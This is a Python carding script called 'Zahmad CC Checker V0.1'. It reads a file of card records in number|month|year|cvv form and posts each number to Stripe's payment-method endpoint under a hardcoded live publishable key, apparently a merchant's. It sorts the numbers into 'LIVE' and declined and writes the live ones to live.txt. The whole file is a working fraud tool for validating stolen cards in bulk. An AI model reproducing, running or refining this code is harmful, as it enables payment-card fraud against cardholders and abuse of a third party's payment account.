import requests
import time

Z = '\033[1;31m'  # Red
F = '\033[2;32m'  # Green
B = '\033[2;36m'  # Cyan
X = '\033[1;33m'  # Yellow
C = '\033[2;35m'  # Purple
W = '\033[37m'   # White
L = '\033[1;34m'  # Blue

def check_card_silent(ccn):
    """
    Check card silently and return status with reason
    Returns: {'status': 'LIVE' or 'DEC', 'reason': 'error message'}
    """
    headers = {
        'accept': 'application/json',
        'content-type': 'application/x-www-form-urlencoded',
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    }
    
    data = (
        f'type=card'
        f'&card[number]={ccn}'
        f'&card[exp_month]=12'
        f'&card[exp_year]=2030'
        f'&key=pk_live_51O7iuGInnULAxJzo9MwrwAdd8iLqfEsrdPpNljsQwueylpttDRMOOt5gSFTfQHG8Gb3opvW8GCVMlEysl53LR4ZF00PczZWWEX'
    )
    
    try:
        response = requests.post(
            'https://api.stripe.com/v1/payment_methods',
            headers=headers,
            data=data,
            timeout=15
        )
        
        result = response.json()
        
        if 'error' in result:
            error_code = result['error'].get('code', '')
            error_msg = result['error'].get('message', 'Unknown error')
            
            if error_code == 'incorrect_number' or 'number is not a valid credit card' in error_msg.lower():
                return {'status': 'DEC', 'reason': 'Declined'}
            
            reason_map = {
                'card_declined': 'Declined',
                'insufficient_funds': 'Insufficient funds',
                'invalid_expiry_month': 'Invalid expiry',
                'invalid_expiry_year': 'Invalid expiry',
                'invalid_cvc': 'Incorrect CVV',
                'expired_card': 'Expired',
                'processing_error': 'Processing error',
            }
            
            reason = reason_map.get(error_code, error_code if error_code else 'Declined')
            return {'status': 'LIVE', 'reason': reason}
        
        elif 'id' in result:
            return {'status': 'LIVE', 'reason': 'Live'}
        
        else:
            return {'status': 'DEC', 'reason': 'Unknown error'}
        
    except Exception as e:
        return {'status': 'DEC', 'reason': f'Error: {str(e)[:30]}'}

def check_card(ccn):
    start_time = time.time()
    
    headers = {
        'accept': 'application/json',
        'content-type': 'application/x-www-form-urlencoded',
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    }
    
    data = (
        f'type=card'
        f'&card[number]={ccn}'
        f'&card[exp_month]=12'
        f'&card[exp_year]=2030'
        f'&key=pk_live_51O7iuGInnULAxJzo9MwrwAdd8iLqfEsrdPpNljsQwueylpttDRMOOt5gSFTfQHG8Gb3opvW8GCVMlEysl53LR4ZF00PczZWWEX'
    )
    
    try:
        response = requests.post(
            'https://api.stripe.com/v1/payment_methods',
            headers=headers,
            data=data,
            timeout=15
        )
        
        result = response.json()
        end_time = time.time()
        time_taken = end_time - start_time
        
        if 'error' in result:
            error_code = result['error'].get('code', '')
            error_msg = result['error'].get('message', 'Unknown error')
            error_type = result['error'].get('type', '')

            if error_code == 'incorrect_number' or 'number is not a valid credit card' in error_msg.lower():
                print(Z + f"[-] DEC ❌" + W)
                print(Z + f"Card: {ccn}" + W)
                print(Z + f"Status: FAKE - Card does NOT exist" + W)
                print(Z + f"Response: {error_msg}" + W)
                print(X + f"Time: {time_taken:.2f}s\n" + W)
                return 'DEC'
            
            else:
                print(F + f"[+] LIVE ✅" + W)
                print(F + f"Card: {ccn}" + W)
                print(F + f"Status: REAL - Card exists" + W)
                print(F + f"Note: {error_msg}" + W)
                print(X + f"Time: {time_taken:.2f}s\n" + W)
                return 'LIVE'
        
        elif 'id' in result:
            print(F + f"[+] LIVE ✅" + W)
            print(F + f"Card: {ccn}" + W)
            print(F + f"Status: REAL - Card exists and valid" + W)
            
            # Extract card details
            if 'card' in result:
                card_data = result['card']
                brand = card_data.get('brand', 'Unknown')
                country = card_data.get('country', 'Unknown')
                funding = card_data.get('funding', 'Unknown')
                
                print(F + f"Brand: {brand}" + W)
                print(F + f"Country: {country}" + W)
                print(F + f"Type: {funding.upper()}" + W)
            
            print(X + f"Time: {time_taken:.2f}s\n" + W)
            return 'LIVE'
        
        else:
            print(Z + f"[-] DEC ❌" + W)
            print(Z + f"Card: {ccn}" + W)
            print(Z + f"Status: Unknown response format" + W)
            print(X + f"Time: {time_taken:.2f}s\n" + W)
            return 'DEC'
        
    except Exception as e:
        end_time = time.time()
        print(Z + f"[-] ERROR ❌" + W)
        print(Z + f"Card: {ccn}" + W)
        print(Z + f"Error: {str(e)}" + W)
        print(X + f"Time: {end_time - start_time:.2f}s\n" + W)
        return 'DEC'

def main():
    print(Z + "□■" * 30)
    print(L + "  Zahmad CC Checker V0.1")
    print(F + "□■" * 30 + "\n")
    
    # Ask for txt file
    filename = input(F + "Enter path to CC list file: " + W).strip()
    
    try:
        with open(filename, 'r', encoding='utf-8') as f:
            lines = f.readlines()
        
        print(F + f"[+] Loaded {len(lines)} lines from {filename}" + W)
        print(X + "[*] Starting checks...\n" + W)
        
        live_count = 0
        dec_count = 0
        live_cards = []
        
        for i, line in enumerate(lines, 1):
            card_input = line.strip()
            
            if not card_input:
                continue
            
            parts = card_input.split('|')
            
            if len(parts) < 4:
                current_time = time.strftime("%H:%M:%S")
                print(Z + f"[{current_time}] {card_input} -> FAIL ✗ (Invalid format)" + W)
                dec_count += 1
                continue
            
            ccn = parts[0].strip()
            mm = parts[1].strip()
            yy = parts[2].strip()
            cvv = parts[3].strip()
            
            if len(ccn) != 16 or not ccn.isdigit():
                current_time = time.strftime("%H:%M:%S")
                print(Z + f"[{current_time}] {card_input} -> FAIL ✗ (Declined)" + W)
                dec_count += 1
                continue
            
            current_time = time.strftime("%H:%M:%S")
            result = check_card_silent(ccn)
            
            if result['status'] == 'LIVE':
                live_count += 1
                live_cards.append(card_input)
                print(F + f"[{current_time}] {card_input} -> APPROVED ✓ ({result['reason']})" + W)
            else:
                dec_count += 1
                print(Z + f"[{current_time}] {card_input} -> FAIL ✗ ({result['reason']})" + W)
            
            time.sleep(0.5)
        
        if live_cards:
            with open('live.txt', 'w', encoding='utf-8') as f:
                for card in live_cards:
                    f.write(card + '\n')
            print(F + f"\n[+] Saved {len(live_cards)} LIVE cards to live.txt" + W)

        print(F + "\n" + "="*60 + W)
        print(F + "SUMMARY:" + W)
        print(F + f"Total Checked: {live_count + dec_count}" + W)
        print(F + f"APPROVED: {live_count}" + W)
        print(Z + f"DECLINED: {dec_count}" + W)
        print(F + "="*60 + "\n" + W)
        
    except FileNotFoundError:
        print(Z + f"\n[!] Error: File '{filename}' not found\n" + W)
    except Exception as e:
        print(Z + f"\n[!] Error reading file: {e}\n" + W)

if __name__ == "__main__":
    main()
